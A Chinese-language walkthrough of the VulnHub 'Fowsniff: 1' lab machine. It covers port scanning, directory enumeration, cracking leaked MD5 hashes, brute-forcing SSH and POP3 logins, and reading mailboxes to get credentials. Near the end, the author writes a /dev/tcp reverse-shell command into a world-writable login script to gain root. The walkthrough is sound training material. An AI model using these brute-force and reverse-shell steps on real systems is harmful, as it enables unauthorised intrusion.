FOWSNIFF: 1
https://www.vulnhub.com/entry/fowsniff-1,262/
主机发现
# yunki @ yunki in ~/vulnhub/Fowsniff [12:12:52]
$ nmap -sn 192.168.54.0/24
Nmap scan report for 192.168.54.5
Host is up (0.0097s latency).
nmap扫描
# yunki @ yunki in ~/vulnhub/Fowsniff [12:14:21]
$ sudo nmap --min-rate 10000 -p- 192.168.54.5
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 12:14 CST
Nmap scan report for 192.168.54.5
Host is up (0.00028s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
143/tcp open imap
MAC Address: 00:0C:29:59:68:8D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.45 seconds
# yunki @ yunki in ~/vulnhub/Fowsniff [12:14:59]
$ sudo nmap -sT -sV -sC -O -p22,80,110,143 192.168.54.5
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 12:15 CST
Nmap scan report for 192.168.54.5
Host is up (0.00054s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 903566f4c6d295121be8cddeaa4e0323 (RSA)
| 256 539d236734cf0ad55a9a1174bdfdde71 (ECDSA)
|_ 256 a28fdbae9e3dc9e6a9ca03b1d71b6683 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Fowsniff Corp - Delivering Solutions
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES AUTH-RESP-CODE SASL(PLAIN) USER UIDL PIPELINING CAPA TOP
143/tcp open imap Dovecot imapd
|_imap-capabilities: IDLE ENABLE Pre-login SASL-IR ID OK capabilities post-login more have listed AUTH=PLAINA0001 LOGIN-REFERRALS IMAP4rev1 LITERAL+
MAC Address: 00:0C:29:59:68:8D (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.76 seconds
# yunki @ yunki in ~/vulnhub/Fowsniff [12:21:19] C:255
$ sudo nmap -sU -p22,80,110,143 192.168.54.5
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 12:21 CST
Nmap scan report for 192.168.54.5
Host is up (0.00031s latency).
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
110/udp closed pop3
143/udp closed imap
MAC Address: 00:0C:29:59:68:8D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
web信息收集
目录爆破
# yunki @ yunki in ~/vulnhub/Fowsniff [12:15:37]
$ gobuster dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --url http://192.168.54.5 --no-error| tee gobuster.log
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.54.5
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/03/29 12:18:02 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 313] [--> http://192.168.54.5/images/]
/assets (Status: 301) [Size: 313] [--> http://192.168.54.5/assets/]
Progress: 85890 / 87665 (97.98%)
===============================================================
2023/03/29 12:18:20 Finished
===============================================================
详细目录爆破
gobuster dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --url http://192.168.54.5 --no-error -x php,html,txt,rar,zip,7z | tee gobuster.log
将上面的文件保存到leaked_data里。使用john破解一下md5。
# yunki @ yunki in ~/vulnhub/Fowsniff [14:00:13]
$ sudo john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt leaked_data
[sudo] yunki 的密码:
123456
对不起,请重试。
[sudo] yunki 的密码:
Using default input encoding: UTF-8
Loaded 9 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=8
1Press 'q' or Ctrl-C to abort, almost any other key for status
scoobydoo2 (seina@fowsniff)
orlando12 (parede@fowsniff)
apples01 (tegel@fowsniff)
skyler22 (baksteen@fowsniff)
mailcall (mauer@fowsniff)
07011972 (sciana@fowsniff)
carp4ever (mursten@fowsniff)
bilbo101 (mustikka@fowsniff)
8g 0:00:00:01 94.26% (ETA: 14:00:52) 7.547g/s 12811Kp/s 12811Kc/s 33885KC/s 09063658188..09062577566
8g 0:00:00:01 DONE (2023-03-29 14:00) 7.017g/s 12581Kp/s 12581Kc/s 32177KC/s fuckyooh21..*7¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
将中间的凭据保存到cracked_creds文件中。处理一下文件,尝试ssh爆破登录。
# yunki @ yunki in ~/vulnhub/Fowsniff [14:01:18]
$ cat cracked_creds|awk -F ' ' '{print $1}'
scoobydoo2
orlando12
apples01
skyler22
mailcall
07011972
carp4ever
bilbo101
# yunki @ yunki in ~/vulnhub/Fowsniff [14:04:50]
$ cat cracked_creds|awk -F ' ' '{print $1}' > password.txt
# yunki @ yunki in ~/vulnhub/Fowsniff [14:06:26]
$ cat cracked_creds|awk -F ' ' '{print $2}' | awk -F '(' '{print $2}' | awk -F '@' '{print $1}'
seina
parede
tegel
baksteen
mauer
sciana
mursten
mustikka
# yunki @ yunki in ~/vulnhub/Fowsniff [14:06:48]
$ cat cracked_creds|awk -F ' ' '{print $2}' | awk -F '(' '{print $2}' | awk -F '@' '{print $1}' > username.txt
hydra/crackmapexec ssh爆破
# yunki @ yunki in ~/vulnhub/Fowsniff [14:08:59]
$ hydra -L username.txt -P password.txt 192.168.54.5 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-29 14:09:22
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 64 login tries (l:8/p:8), ~4 tries per task
[DATA] attacking ssh://192.168.54.5:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-29 14:09:31
# yunki @ yunki in ~/vulnhub/Fowsniff [14:09:31]
$ crackmapexec ssh 192.168.54.5 -u username.txt -p password.txt --continue-on-success
/usr/lib/python3/dist-packages/requests/__init__.py:87: RequestsDependencyWarning: urllib3 (1.26.12) or chardet (5.1.0) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({}) doesn't match a supported "
SSH 192.168.54.5 22 192.168.54.5 [*] SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
SSH 192.168.54.5 22 192.168.54.5 [-] seina:scoobydoo2 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] seina:orlando12 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] seina:apples01 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] seina:skyler22 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] seina:mailcall Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] seina:07011972 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] seina:carp4ever Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] seina:bilbo101 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] parede:scoobydoo2 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] parede:orlando12 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] parede:apples01 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] parede:skyler22 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] parede:mailcall Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] parede:07011972 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] parede:carp4ever Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] parede:bilbo101 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] tegel:scoobydoo2 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] tegel:orlando12 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] tegel:apples01 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] tegel:skyler22 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] tegel:mailcall Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] tegel:07011972 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] tegel:carp4ever Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] tegel:bilbo101 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] baksteen:scoobydoo2 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] baksteen:orlando12 Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] baksteen:apples01 Authentication failed.
hydra 爆破pop3
# yunki @ yunki in ~/vulnhub/Fowsniff [14:15:17]
$ hydra -L username.txt -P password.txt 192.168.54.5 pop3 -f # exit when a login/pass pair is found
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-29 14:15:32
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 64 login tries (l:8/p:8), ~4 tries per task
[DATA] attacking pop3://192.168.54.5:110/
[110][pop3] host: 192.168.54.5 login: seina password: scoobydoo2
[STATUS] attack finished for 192.168.54.5 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-29 14:15:43
# 实际上也就只有一组。
# yunki @ yunki in ~/vulnhub/Fowsniff [14:15:53] C:255
$ hydra -L username.txt -P password.txt 192.168.54.5 pop3
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-29 14:15:55
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 64 login tries (l:8/p:8), ~4 tries per task
[DATA] attacking pop3://192.168.54.5:110/
[110][pop3] host: 192.168.54.5 login: seina password: scoobydoo2
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-29 14:16:47
发现用户host: 192.168.54.5 login: seina password: scoobydoo2
用pop3登录。
# yunki @ yunki in ~/vulnhub/Fowsniff [14:18:02] C:1
$ sudo nc 192.168.54.5 110
+OK Welcome to the Fowsniff Corporate Mail Server!
user seina
+OK
pass scoobydoo2
+OK Logged in.
list
+OK 2 messages:
1 1622
2 1280
.
retr 1
+OK 1622 octets
Return-Path: <stone@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,
mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff,
tegel@fowsniff
Subject: URGENT! Security EVENT!
Message-Id: <20180313185107.0FA3916A@fowsniff>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: stone@fowsniff (stone)
Dear All,
A few days ago, a malicious actor was able to gain entry to
our internal email systems. The attacker was able to exploit
incorrectly filtered escape characters within our SQL database
to access our login credentials. Both the SQL and authentication
system used legacy methods that had not been updated in some time.
We have been instructed to perform a complete internal system
overhaul. While the main systems are "in the shop," we have
moved to this isolated, temporary server that has minimal
functionality.
This server is capable of sending and receiving emails, but only
locally. That means you can only send emails to other users, not
to the world wide web. You can, however, access this system via
the SSH protocol.
The temporary password for SSH is "S1ck3nBluff+secureshell"
You MUST change this password as soon as possible, and you will do so under my
guidance. I saw the leak the attacker posted online, and I must say that your
passwords were not very secure.
Come see me in my office at your earliest convenience and we'll set it up.
Thanks,
A.J Stone
.
retr 2
+OK 1280 octets
Return-Path: <baksteen@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1004)
id 101CA1AC2; Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
To: seina@fowsniff
Subject: You missed out!
Message-Id: <20180313185405.101CA1AC2@fowsniff>
Date: Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
From: baksteen@fowsniff
Devin,
You should have seen the brass lay into AJ today!
We are going to be talking about this one for a looooong time hahaha.
Who knew the regional manager had been in the navy? She was swearing like a sailor!
I don't know what kind of pneumonia or something you brought back with
you from your camping trip, but I think I'm coming down with it myself.
How long have you been gone - a week?
Next time you're going to get sick and miss the managerial blowout of the century,
at least keep it to yourself!
I'm going to head home early and eat some chicken soup.
I think I just got an email from Stone, too, but it's probably just some
"Let me explain the tone of my meeting with management" face-saving mail.
I'll read it when I get back.
Feel better,
Skyler
PS: Make sure you change your email password.
AJ had been telling us to do that right before Captain Profanity showed up.
.
发现了这样关键的信息,The temporary password for SSH is "S1ck3nBluff+secureshell"
,和一些人物关系。
有密码,有用户,尝试ssh爆破登录。
# yunki @ yunki in ~/vulnhub/Fowsniff [14:25:34] C:2
$ crackmapexec ssh 192.168.54.5 -u username.txt -p "S1ck3nBluff+secureshell"
/usr/lib/python3/dist-packages/requests/__init__.py:87: RequestsDependencyWarning: urllib3 (1.26.12) or chardet (5.1.0) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({}) doesn't match a supported "
SSH 192.168.54.5 22 192.168.54.5 [*] SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
SSH 192.168.54.5 22 192.168.54.5 [-] seina:S1ck3nBluff+secureshell Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] parede:S1ck3nBluff+secureshell Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [-] tegel:S1ck3nBluff+secureshell Authentication failed.
SSH 192.168.54.5 22 192.168.54.5 [+] baksteen:S1ck3nBluff+secureshell
# yunki @ yunki in ~/vulnhub/Fowsniff [14:25:56]
$ hydra -L username.txt -p "S1ck3nBluff+secureshell" ssh://192.168.54.5
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-29 14:26:13
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 8 tasks per 1 server, overall 8 tasks, 8 login tries (l:8/p:1), ~1 try per task
[DATA] attacking ssh://192.168.54.5:22/
[22][ssh] host: 192.168.54.5 login: baksteen password: S1ck3nBluff+secureshell
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-29 14:26:16
获得初始权限
# yunki @ yunki in ~/vulnhub/Fowsniff [14:26:16]
$ ssh baksteen@192.168.54.5
The authenticity of host '192.168.54.5 (192.168.54.5)' can't be established.
ECDSA key fingerprint is SHA256:5i4lzzyTeroRL7skmPatRi24vG1+59KMgqHGLyxre9Y.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.54.5' (ECDSA) to the list of known hosts.
baksteen@192.168.54.5's password:
_____ _ __ __
:sdddddddddddddddy+ | ___|____ _____ _ __ (_)/ _|/ _|
:yNMMMMMMMMMMMMMNmhsso | |_ / _ \ \ /\ / / __| '_ \| | |_| |_
.sdmmmmmNmmmmmmmNdyssssso | _| (_) \ V V /\__ \ | | | | _| _|
-: y. dssssssso |_| \___/ \_/\_/ |___/_| |_|_|_| |_|
-: y. dssssssso ____
-: y. dssssssso / ___|___ _ __ _ __
-: y. dssssssso | | / _ \| '__| '_ \
-: o. dssssssso | |__| (_) | | | |_) | _
-: o. yssssssso \____\___/|_| | .__/ (_)
-: .+mdddddddmyyyyyhy: |_|
-: -odMMMMMMMMMMmhhdy/.
.ohdddddddddddddho: Delivering Solutions
**** Welcome to the Fowsniff Corporate Server! ****
---------- NOTICE: ----------
* Due to the recent security breach, we are running on a very minimal system.
* Contact AJ Stone -IMMEDIATELY- about changing your email and SSH passwords.
New release '18.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Tue Mar 13 16:55:40 2018 from 192.168.7.36
baksteen@fowsniff:~$ whoami
baksteen
baksteen@fowsniff:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:59:68:8d brd ff:ff:ff:ff:ff:ff
inet 192.168.54.5/24 brd 192.168.54.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe59:688d/64 scope link
valid_lft forever preferred_lft forever
提权
baksteen@fowsniff:~$ id
uid=1004(baksteen) gid=100(users) groups=100(users),1001(baksteen)
baksteen@fowsniff:~$ find / -group users -type f -not -path "/proc/*" 2>/dev/null
/opt/cube/cube.sh
/home/baksteen/.cache/motd.legal-displayed
/home/baksteen/Maildir/dovecot-uidvalidity
/home/baksteen/Maildir/dovecot.index.log
/home/baksteen/Maildir/new/1520967067.V801I23764M196461.fowsniff
/home/baksteen/Maildir/dovecot-uidlist
/home/baksteen/Maildir/dovecot-uidvalidity.5aa21fac
/home/baksteen/.viminfo
/home/baksteen/.bash_history
/home/baksteen/.lesshsQ
/home/baksteen/.bash_logout
/home/baksteen/term.txt
/home/baksteen/.profile
/home/baksteen/.bashrc
/sys/fs/cgroup/systemd/user.slice/user-1004.slice/user@1004.service/tasks
/sys/fs/cgroup/systemd/user.slice/user-1004.slice/user@1004.service/cgroup.procs
/sys/fs/cgroup/systemd/user.slice/user-1004.slice/user@1004.service/init.scope/tasks
/sys/fs/cgroup/systemd/user.slice/user-1004.slice/user@1004.service/init.scope/cgroup.procs
/sys/fs/cgroup/systemd/user.slice/user-1004.slice/user@1004.service/init.scope/cgroup.clone_children
/sys/fs/cgroup/systemd/user.slice/user-1004.slice/user@1004.service/init.scope/notify_on_release
发现第一个文件就很感兴趣,这不就是刚刚ssh登陆时的信息吗,这里写入反弹shell,同时开启监听,然后重新登陆ssh。
baksteen@fowsniff:~$ cat /opt/cube/cube.sh
printf "
_____ _ __ __
:sdddddddddddddddy+ | ___|____ _____ _ __ (_)/ _|/ _|
:yNMMMMMMMMMMMMMNmhsso | |_ / _ \ \ /\ / / __| '_ \| | |_| |_
.sdmmmmmNmmmmmmmNdyssssso | _| (_) \ V V /\__ \ | | | | _| _|
-: y. dssssssso |_| \___/ \_/\_/ |___/_| |_|_|_| |_|
-: y. dssssssso ____
-: y. dssssssso / ___|___ _ __ _ __
-: y. dssssssso | | / _ \| '__| '_ \
-: o. dssssssso | |__| (_) | | | |_) | _
-: o. yssssssso \____\___/|_| | .__/ (_)
-: .+mdddddddmyyyyyhy: |_|
-: -odMMMMMMMMMMmhhdy/.
.ohdddddddddddddho: Delivering Solutions\n\n"
baksteen@fowsniff:~$ echo "bash -c 'exec bash -i &>/dev/tcp/192.168.54.128/443 <&1'" > /opt/cube/cube.sh
baksteen@fowsniff:~$ ssh^C
baksteen@fowsniff:~$ exit
logout
Connection to 192.168.54.5 closed.
# yunki @ yunki in ~/vulnhub/Fowsniff [14:32:52] C:130
$ ssh baksteen@192.168.54.5
baksteen@192.168.54.5's password:
# yunki @ yunki in ~/vulnhub/Fowsniff [14:16:47]
$ sudo nc -lnvp 443
[sudo] yunki 的密码:
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.5] 42890
bash: cannot set terminal process group (3121): Inappropriate ioctl for device
bash: no job control in this shell
root@fowsniff:/# whoami
whoami
root
root@fowsniff:/# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:59:68:8d brd ff:ff:ff:ff:ff:ff
inet 192.168.54.5/24 brd 192.168.54.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe59:688d/64 scope link
valid_lft forever preferred_lft forever
flag获取
root@fowsniff:/root# cd ~
cd ~
root@fowsniff:/root# cat flag.txt
cat flag.txt
___ _ _ _ _ _
/ __|___ _ _ __ _ _ _ __ _| |_ _ _| |__ _| |_(_)___ _ _ __| |
| (__/ _ \ ' \/ _` | '_/ _` | _| || | / _` | _| / _ \ ' \(_-<_|
\___\___/_||_\__, |_| \__,_|\__|\_,_|_\__,_|\__|_\___/_||_/__(_)
|___/
(_)
|--------------
|&&&&&&&&&&&&&&|
| R O O T |
| F L A G |
|&&&&&&&&&&&&&&|
|--------------
|
|
|
|
|
|
---
Nice work!
This CTF was built with love in every byte by @berzerk0 on Twitter.
Special thanks to psf, @nbulischeck and the whole Fofao Team.